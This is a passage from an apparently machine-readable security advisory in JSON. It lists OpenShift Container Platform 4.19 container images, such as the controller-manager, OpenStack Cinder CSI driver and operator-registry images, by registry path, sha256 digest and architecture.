"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
